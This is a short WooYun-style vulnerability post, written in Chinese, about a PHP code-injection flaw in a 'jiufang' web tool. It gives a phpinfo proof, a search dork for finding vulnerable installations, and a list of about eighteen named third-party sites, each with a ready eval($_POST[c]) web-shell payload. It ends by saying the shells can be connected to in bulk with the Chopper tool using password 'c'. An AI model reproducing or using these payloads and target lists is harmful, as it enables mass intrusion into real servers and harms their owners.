WooYun.org

1、可以执行php：
http://www.hao123.cd/tool/jiufang/?q={${phpinfo%28%29}}

2、然后百度、谷歌等搜索引擎搜：
inurl:jiufang/?q=
几乎全部都可以拿shell，这个系统使用量应该不低吖
3、下面是一部分，太多了，秒拿shell
http://www.hao123.cd/tool/jiufang/?q={${eval%28$_POST[c]%29}}
http://www.dd123.com/jiufang/?q={${eval%28$_POST[c]%29}}
http://www.q210.com/tools/jiufang/?q={${eval%28$_POST[c]%29}}
http://www.0716.so/tools/life/jiufang/?q={${eval%28$_POST[c]%29}}
http://tools.tongluren.com/jiufang/?q={${eval%28$_POST[c]%29}}
http://www.048100.com.cn/chaxun/jiufang/?q={${eval%28$_POST[c]%29}}
http://www.handan123.net/bianmin/jiufang/?q={${eval%28$_POST[c]%29}}
http://www.1314ms.com/tools/life/jiufang/?q={${eval%28$_POST[c]%29}}
http://zyxqw.com/box/jiufang/?q={${eval%28$_POST[c]%29}}
http://www.q210.com/tools/jiufang/?id={${eval%28$_POST[c]%29}}
http://7274.net/bbx/jiufang/?q={${eval%28$_POST[c]%29}}
http://www.meizhou.com/tool/jiufang/?q={${eval%28$_POST[c]%29}}
http://www.ls211200.cn/tool/jiufang/?q={${eval%28$_POST[c]%29}}
http://www.chennet.com/bbx/jiufang/?q={${eval%28$_POST[c]%29}}
http://www.rzluntan.com/tool/jiufang/?q={${eval%28$_POST[c]%29}}
http://www.d777.com/jiufang/?q={${eval%28$_POST[c]%29}}
http://jiufang.51cha.org/?q={${eval%28$_POST[c]%29}}
http://www.hanjie580.com/bs/box/jiufang/?q={${eval%28$_POST[c]%29}}
还有很多等着去尝试，批量拿shell，感觉太不一样了
4、菜刀去连，密码c，你懂得，好多服务器不止一个站，怎一个爽字了得